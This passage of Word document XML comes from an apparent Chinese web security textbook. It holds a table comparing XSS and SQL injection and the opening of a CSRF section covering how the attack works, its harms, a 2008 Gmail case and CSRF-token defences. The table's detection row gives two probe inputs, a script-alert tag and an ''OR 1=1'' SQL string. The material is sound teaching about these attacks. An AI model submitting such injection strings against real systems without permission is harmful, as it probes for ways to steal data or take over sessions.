          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XSS vs SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>注入：核心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637"/>
        <w:gridCol w:w="3547"/>
        <w:gridCol w:w="3660"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="10738962" w14:textId="77777777" w:rsidTr="00501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9FBB8AD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维度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200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8E8AC2D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XSS</w:t>
            </w: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攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="206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1220056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SQL</w:t>
            </w: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注入攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="06BA918B" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="925" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3B6A398A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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>攻击目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="752E264E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用户浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0680654B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数据库服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="09AE0E09" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="925" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3E6E23D0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rFonts w:cs="Times New Roman"/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利用点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2260C3BF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网页展示用户输入内容时</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7542406A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用户输入拼接到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SQL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语句时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="371FBD63" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="925" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="755D158E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主要危害</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0F10E1D3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窃取用户数据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/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会话</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="15B40B3C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窃取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/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篡改数据库内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="24D29B6C" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="925" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="57B14878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攻击类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="473604B3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客户端攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7E5F3073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服务端攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="46236779" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="925" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3EA14A96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核心防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4CB739DA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输出编码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 xml:space="preserve"> + CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2C334679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参数化查询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 xml:space="preserve"> + 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输入过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="14D4ADCF" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="925" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="57456CCA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漏洞检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1D6B6770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输入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&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3C6BF64D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输入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' OR 1=1 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E1C9CC4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB6D861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关键区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0397DE87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XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用的是浏览器信任，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入利用的是数据库信任</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744099FC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D605A8C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E8C65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什么是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DCC8F3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跨站请求伪造（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是攻击者诱导用户在其已登录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用中执行非本意的操作。简单来说，就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>借刀杀人</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>——利用用户的登录状态进行恶意操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215C5FB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攻击原理（三步曲）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3858EE66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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户登录：受害者登录信任网站（如银行），获得会话</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BE8C15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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>诱导访问：攻击者诱骗受害者访问恶意网站（如通过钓鱼邮件）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1710D0FB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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造请求：恶意网站自动发送请求到信任网站，利用保存的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2DEE5E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击危害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E8D67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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>资金盗窃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2368A2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>银行账户转账</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0871DBE2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电商平台购物</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D1617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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>账户劫持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7815318A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601A7C62" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定攻击者支付方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322A22D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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>数据篡改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B48BBE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除重要文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3361A103" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改系统配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436AB147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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>自动操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1FCBAE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以用户名义发帖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D5B8B7" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关注特定账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C0A89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真实案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CD239B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2008</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Gmail</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DBB245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攻击者可修改邮件过滤规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852ED69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将所有新邮件转发到攻击者邮箱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506AC802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影响数百万用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B87E007" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>防御方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AA2438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1. CSRF Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（最有效方法）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C2A40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原理：每次表单提交时要求携带随机</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572D8BAD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验证流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09544F0E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
